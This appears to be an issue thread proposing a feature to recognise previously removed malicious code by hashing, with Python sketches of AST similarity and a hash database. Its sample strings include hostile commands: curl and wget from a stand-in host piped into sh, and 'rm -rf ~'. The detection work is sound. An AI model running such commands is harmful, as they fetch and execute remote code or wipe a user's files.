feature: automatically identify code removed previously for being malicious.

Question

Opened this issue a year ago · 0 comments

A couple of ideas for approaching this (just spitballing; better solutions possibly exist as well):

- taking a cryptographic hash of a file (language-agnostic, but inflexible to minor code changes)
- computing a locality-sensitive hash of the malicious file using opcode disassembly or AST features (Python-specific)
  - the similarity of another file to a known malicious file could then be measured as the Levenshtein distance between the two files' locality-sensitive hashes.
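
To make the trade-off between the two ideas concrete, here is a rough sketch. It is not a real locality-sensitive hash: as a stand-in it compares the raw sequence of AST node type names directly with Levenshtein distance, which shows the same "tolerant to small edits" property. The function names (`sha256_hex`, `ast_node_types`, `levenshtein`, `similarity`) and the sample snippets are made up for illustration.

```python
import ast
import hashlib


def sha256_hex(source: str) -> str:
    """Exact-match fingerprint: any byte change yields a different digest."""
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


def ast_node_types(source: str) -> list[str]:
    """AST node type names in breadth-first order.

    Identifiers, literal values, comments, and whitespace are ignored,
    so renaming a variable or swapping a string does not change the result.
    """
    return [type(node).__name__ for node in ast.walk(ast.parse(source))]


def levenshtein(a, b) -> int:
    """Edit distance between two sequences (strings or lists of tokens)."""
    prev = list(range(len(b) + 1))
    for i, x in enumerate(a, start=1):
        curr = [i]
        for j, y in enumerate(b, start=1):
            cost = 0 if x == y else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution
        prev = curr
    return prev[-1]


def similarity(a, b) -> float:
    """Normalised similarity in [0, 1]; 1.0 means identical sequences."""
    longest = max(len(a), len(b))
    if longest == 0:
        return 1.0
    return 1.0 - levenshtein(a, b) / longest


# Hypothetical samples: the variant only changes a string literal.
known = "import os\nos.system('curl http://example.invalid | sh')\n"
variant = "import os\nos.system('wget http://example.invalid | sh')\n"

exact_match = sha256_hex(known) == sha256_hex(variant)
structural = similarity(ast_node_types(known), ast_node_types(variant))
```

Here the cryptographic hashes differ even though only a string literal changed, while the AST-based comparison still treats the two files as structurally identical. A real implementation would probably want a proper fuzzy hash and a tuned similarity threshold rather than this direct comparison.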

This would obviously require a database of some sort, with the hashes of malicious files committed to it in response to reports.
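
As a minimal sketch of what that database could look like, assuming SQLite and exact SHA-256 matching only: the table name `malicious_hashes` and the helpers `open_db`, `report_malicious`, and `is_known_malicious` are hypothetical and not part of any existing tool.

```python
import hashlib
import sqlite3


def open_db(path: str = ":memory:") -> sqlite3.Connection:
    """Open (or create) the hash database; in-memory by default for the demo."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS malicious_hashes ("
        "sha256 TEXT PRIMARY KEY, reason TEXT NOT NULL)"
    )
    return conn


def file_digest(data: bytes) -> str:
    """SHA-256 hex digest of the raw file contents."""
    return hashlib.sha256(data).hexdigest()


def report_malicious(conn: sqlite3.Connection, data: bytes, reason: str) -> None:
    """Record a file's hash after a report; duplicate reports are ignored."""
    conn.execute(
        "INSERT OR IGNORE INTO malicious_hashes (sha256, reason) VALUES (?, ?)",
        (file_digest(data), reason),
    )
    conn.commit()


def is_known_malicious(conn: sqlite3.Connection, data: bytes) -> bool:
    """True if this exact file content was previously reported."""
    row = conn.execute(
        "SELECT 1 FROM malicious_hashes WHERE sha256 = ?",
        (file_digest(data),),
    ).fetchone()
    return row is not None


conn = open_db()
report_malicious(conn, b"import os; os.system('rm -rf ~')", "reported by a user")
```

Similarity-based lookups would need a different storage layout, since a fuzzy match cannot be answered with a primary-key lookup.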